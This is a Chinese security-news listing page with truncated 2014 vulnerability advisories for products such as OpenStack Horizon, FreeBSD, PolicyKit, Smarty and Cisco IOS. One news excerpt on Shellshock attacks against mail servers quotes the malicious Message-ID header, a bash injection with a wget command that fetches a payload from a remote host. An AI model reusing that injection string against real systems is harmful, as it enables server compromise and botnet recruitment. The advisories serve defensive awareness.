OpenStack Horizon Host Aggregates Interface HTML注入漏洞（CVE-2014-3594）

2016年10月21日 9 阅读

发布日期：2014-08-19更新日期：2014-10-25受影响系统：openstack OpenStack Dashboard （Horizon）描述：BUGTRAQ ID: 69291CVE（CAN） ID: CVE-2014-3594OpenStack Dashboard Horizon是OpenStack仪表盘项目，提供了到OpenStack服务的Web用户接口。OpenStack Horizon 2013.2.4之前版本、2014.1.2之前版...

FreeBSD沙盒namei查询内存泄露漏洞（CVE-2014-3711）

2016年10月21日 9 阅读

发布日期：2014-10-23更新日期：2014-10-25受影响系统：FreeBSD FreeBSD 9.3FreeBSD FreeBSD 9.2FreeBSD FreeBSD 9.1描述：CVE（CAN） ID: CVE-2014-3711FreeBSD是一种UNIX操作系统，是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。namei内核设备负责执行和缓存从路径名到文件系统对象的转换。FreeBSD 9.1, 9.2, 9....

FreeBSD routed拒绝服务漏洞（CVE-2014-3955）

2016年10月21日 9 阅读

发布日期：2014-10-23更新日期：2014-10-25受影响系统：FreeBSD FreeBSD 9.3FreeBSD FreeBSD 9.2FreeBSD FreeBSD 9.1描述：CVE（CAN） ID: CVE-2014-3955FreeBSD是一种UNIX操作系统，是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。FreeBSD 9.1, 9.2, 9.3版本在处理某些RIP请求时，routed后台程序存在错误，攻...

FreeBSD rtsold “dname_labeldec（）”缓冲区溢出漏洞（CVE-2014-3954）

2016年10月21日 9 阅读

发布日期：2014-10-23更新日期：2014-10-25受影响系统：FreeBSD FreeBSD 9.3FreeBSD FreeBSD 9.2FreeBSD FreeBSD 9.1描述：CVE（CAN） ID: CVE-2014-3954FreeBSD是一种UNIX操作系统，是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。FreeBSD 9.1, 9.2, 9.3版本在处理路由通告报文时，"dname_labeldec（）...

Linux PolicyKit竞争条件权限提升漏洞

2016年10月21日 10 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：PolicyKit PolicyKit描述：CVE（CAN） ID: CVE-2011-1485Policykit是管理策略和权限的框架。PolicyKit （polkit） 0.96版本在pkexec及polkitd程序的实现上存在竞争条件，本地用户利用此漏洞可获取提升的权限。<*来源：Neel Mehta *>建议：厂商补丁：PolicyKit---------目前厂商...

OpenMRS 多个安全漏洞

2016年10月21日 10 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：OpenMRS OpenMRS描述：BUGTRAQ ID: 70664CVE（CAN） ID: CVE-2014-8071,CVE-2014-8072,CVE-2014-8073OpenMRS是开源的电子医疗记录系统。OpenMRS 2.1版本在实现上存在多个HTML注入漏洞、跨站脚本漏洞、跨站请求伪造漏洞、访问绕过漏洞，成功利用后绕过某些安全限制、获取敏感信息、在受影响用户浏览器中执...

Numara/BMC Track-It！ /TrackItWeb/Attachment页任意文件下载漏洞

2016年10月21日 10 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：BMC Track-It！ 11.3.0.355描述：CVE（CAN） ID: CVE-2014-4874BMC Track-It！是集成的IT帮助桌面和资产管理解决方案。BMC Track-It！ 11.3.0.355版本/TrackItWeb/Attachment页在实现上存在任意文件下载漏洞，经过身份验证的远程用户利用此漏洞可下载任意文件。<*来源：Pedro Ribeir...

Interior Design For Android SSL证书验证安全绕过漏洞

2016年10月21日 9 阅读

发布日期：2014-10-21更新日期：2014-10-22受影响系统：Interior Design For Android Interior Design For Android描述：BUGTRAQ ID: 70674CVE（CAN） ID: CVE-2014-7618Interior Design for Android室内设计Android应用程序。Interior Design 1.0及其他版本没有正确验证SSL服务器的X.509证书，在实现上存...

攻击者利用Shellshock漏洞入侵邮件服务器

2016年10月21日 9 阅读

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl脚本，成为僵尸网络的一部分。邮件消息头的构成是： Message-ID:（） { :; };wget -O /tmp/.legend hxxp://190-94-251-41/...

Numara/BMC Track-It！ SQL注入漏洞

2016年10月21日 9 阅读

发布日期：2014-10-21更新日期：2014-10-28受影响系统：BMC Track-It！ 11.3.0.355描述：CVE（CAN） ID: CVE-2014-4873BMC Track-It！是集成的IT帮助桌面和资产管理解决方案。BMC Track-It！ 11.3.0.355版本TrackItWeb/Grid/GetData在实现上存在SQL注入漏洞，经过身份验证的远程用户通过构造的POST数据，利用此漏洞可执行任意SQL命令。<*来...

Dell EqualLogic目录遍历漏洞（CVE-2013-3304）

2016年10月21日 9 阅读

发布日期：2014-10-25更新日期：2014-10-29受影响系统：Dell EqualLogic描述：BUGTRAQ ID: 70760CVE（CAN） ID: CVE-2013-3304Dell EqualLogicis是基于iSCSI的存储网络系统产品。Dell EqualLogic 固件版本6.0及其他版本在实现上存在目录遍历漏洞，成功利用后可使攻击者访问任意系统文件。<*来源：Mauricio Correa*>测试方法：警 告以下...

GNU Wget符号链接漏洞（CVE-2014-4877）

2016年10月21日 9 阅读

发布日期：2014-10-27更新日期：2014-10-29受影响系统：GNU wget描述：BUGTRAQ ID: 70751CVE（CAN） ID: CVE-2014-4877GNU Wget是一个免费的软件包，用于使用HTTP、HTTPS和FTP协议检索文件。GNU Wget在实现上存在符号链接漏洞，攻击者可利用此漏洞访问受限制目录以外的文件，获取敏感信息，执行其他攻击。Linux wget命令详解 http://www.linuxidc.com/L...

Cisco ASR 901 Series Routers拒绝服务漏洞（CVE-2014-3293）

2016年10月21日 10 阅读

发布日期：2014-10-27更新日期：2014-10-29受影响系统：Cisco ASR 901描述：BUGTRAQ ID: 70744CVE（CAN） ID: CVE-2014-3293Cisco ASR 901 Series Routers是聚合服务路由器。Cisco ASR901在畸形IPv4数据包处理的实现上存在拒绝服务漏洞，未经身份验证的远程攻击者可利用此漏洞耗尽ASR901 CPU资源，造成拒绝服务。<*来源：Cisco*>建议：...

binutils任意代码执行漏洞（CVE-2014-8485）

2016年10月21日 12 阅读

发布日期：2014-10-24更新日期：2014-10-29受影响系统：GNU Binutils 2.24GNU Binutils描述：BUGTRAQ ID: 70741CVE（CAN） ID: CVE-2014-8485GNU BinUtils是个二进制工具集，用于执行低层操作。binutils 2.24及其他版本没有进行边界检查，在in _bfd_elf_setup_sections（）实现上存在任意代码执行漏洞，远程攻击者可利用此漏洞在受影响应用上下...

Apache CXF 拒绝服务漏洞（CVE-2014-3584）

2016年10月21日 9 阅读

发布日期：2014-10-24更新日期：2014-10-29受影响系统：Apache Group CXF < 3.0.2Apache Group CXF < 2.7.13描述：BUGTRAQ ID: 70738CVE（CAN） ID: CVE-2014-3584Apache CXF是一个开源服务框架，用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。Apache CXF 2.7.13之前版本、Apache CXF 3.0.2之前...

Smarty远程任意代码执行漏洞（CVE-2014-8350）

2016年10月21日 9 阅读

发布日期：2014-10-22更新日期：2014-10-29受影响系统：Smarty Smarty < 3.1.21描述：BUGTRAQ ID: 70708CVE（CAN） ID: CVE-2014-8350Smarty是PHP模板引擎。Smarty 3.1.21之前版本在实现上存在远程任意代码执行漏洞，攻击者可利用此漏洞在受影响上下文中执行任意PHP代码。<*来源：Thue*>建议：厂商补丁：Smarty------目前厂商已经发布了升...

EMC Avamar 信息泄露漏洞（CVE-2014-4624）

2016年10月21日 9 阅读

发布日期：2014-10-23更新日期：2014-10-29受影响系统：EMC Avamar 6.x描述：BUGTRAQ ID: 70709CVE（CAN） ID: CVE-2014-4624EMC Avamar是远程备份和恢复解决方案。EMC Avamar Data Store （ADS）、Avamar Virtual Edition （AVE） 6.x及7.0.x－7.0.2-43版本没有对Java API调用的身份验证，远程攻击者通过构造的调用，利用...

Cisco IOS及IOS XE Software拒绝服务漏洞（CVE-2014-3409）

2016年10月21日 10 阅读

发布日期：2014-10-24更新日期：2014-10-29受影响系统：Cisco IOS <= 12.2（33）SRE9a描述：BUGTRAQ ID: 70715CVE（CAN） ID: CVE-2014-3409Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统。Cisco IOS 12.2（33）SRE9a及更早版本、IOS XE 3.13S及更早版本在以太网连接故障管理（CFM）处理功能的实现上存在安全漏洞，远程攻击者...

Apache CXF SAML SubjectConfirmation安全限制绕过漏洞

2016年10月21日 9 阅读

发布日期：2014-10-24更新日期：2014-10-29受影响系统：Apache Group CXF < 3.0.2Apache Group CXF < 2.7.13描述：BUGTRAQ ID: 70736CVE（CAN） ID: CVE-2014-3623Apache CXF是一个开源服务框架，用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。Apache CXF 2.7.13之前版本、Apache CXF 3.0.2之前...

Pidgin 拒绝服务漏洞（CVE-2014-3695）

2016年10月21日 9 阅读

发布日期：2014-10-22更新日期：2014-10-29受影响系统：Pidgin Pidgin < 2.10.10Pidgin Pidgin描述：BUGTRAQ ID: 70702CVE（CAN） ID: CVE-2014-3695Pidgin是一款多合一世界主流即时通讯软件集成工具。Pidgin 在解析畸形的MXit表情符号时，由于恶意服务器或中间人攻击者发送较大长度值的表情符号，导致libpurple存在拒绝服务漏洞，攻击者可利用此漏洞使受影...